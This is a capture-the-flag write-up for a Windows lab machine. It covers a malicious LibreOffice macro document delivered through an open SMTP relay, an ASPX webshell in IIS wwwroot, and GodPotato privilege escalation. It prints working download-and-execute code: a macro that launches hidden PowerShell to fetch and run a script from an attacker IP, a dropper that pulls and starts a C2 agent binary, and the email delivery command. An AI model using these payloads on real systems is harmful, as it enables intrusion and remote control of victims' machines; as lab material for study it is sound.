Job
Overview
Job is a Windows machine where a job application portal accepts LibreOffice documents sent via email. A malicious ODT with a VBA macro triggers a callback when opened by an automated process. The initial foothold user has write access to the IIS wwwroot, allowing deployment of an ASPX webshell for a higher-privileged shell. The IIS application pool identity carries SeImpersonatePrivilege, enabling a GodPotato SYSTEM escalation.
Recon
Nmap
sudo nmap -sC -sV -vv -oA tcp 10.129.43.232 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.43.232SMTP (25) is open and accepting connections. Port 80 hosts a job application portal:
The site asks applicants to submit their CV as a document attached to an email sent to [email protected].
SMTP - Guest Relay
Test SMTP for open relay:
The SMTP server accepts emails from unauthenticated senders - we can send arbitrary emails including file attachments.
Foothold
Malicious LibreOffice Document
Craft a LibreOffice ODT with a VBA macro set to execute on document load. The macro downloads and runs an AdaptixC2 agent:
VBA Macro:
Sub OnLoad
Dim os as string
os = GetOS
If os = "windows" OR os = "osx" OR os = "linux" Then
Exploit
end If
End Sub
Sub Exploit
Shell("cmd.exe /C ""powershell.exe -nop -w hidden -c $j=new-object net.webclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){$j.proxy=[Net.WebRequest]::GetSystemWebProxy();$j.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.98:443/ps'));""")
End Sub
Function GetOS() as string
select case getGUIType
case 1: GetOS = "windows"
case 3: GetOS = "osx"
case 4: GetOS = "linux"
end select
End FunctionSet the macro to trigger on the Document Open event: Tools → Customize → Events → Open Document.
The ps PowerShell dropper script served on our HTTP listener:
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.98:443/agent.exe", "C:\\Windows\\Temp\\agent.exe")
Start-Process C:\\Windows\\Temp\\agent.exeagent.exe is an AdaptixC2 agent binary.
Send the document via SMTP using swaks:
sendemail -s 10.129.43.232 -f "syk0 <[email protected]>" -t [email protected] \
-o tls=no -m "Job Application" -a msf.odtAn automated process opens the document and we receive an AdaptixC2 beacon as jack.black.
Lateral Movement
IIS wwwroot Write Access
Enumerate jack.black's group memberships and file permissions. The account is part of the developers group with write access to the IIS wwwroot:
Drop an ASPX webshell into wwwroot. Use it to execute the same PowerShell dropper for a new AdaptixC2 agent running as the IIS app pool identity:
powershell.exe -nop -w hidden -c $j=new-object net.webclient;...IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.98:443/ps1'));New beacon as the IIS application pool account.
Privilege Escalation
SeImpersonatePrivilege → GodPotato
The IIS application pool identity has SeImpersonatePrivilege:
SeImpersonatePrivilege is a commonly abused Windows privilege. It allows a process to impersonate any user whose token it can obtain. GodPotato abuses DCOM to coerce SYSTEM to authenticate to a local server, then impersonates that token to spawn a SYSTEM process.
Upload and execute GodPotato to run our implant as SYSTEM. Root flag accessible.
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SMTP open relay + job portal | Document submission vector |
| Foothold | Malicious ODT macro + swaks | Beacon as jack.black |
| Lateral movement | wwwroot write → ASPX webshell | Beacon as IIS app pool |
| Privesc | SeImpersonatePrivilege + GodPotato | SYSTEM |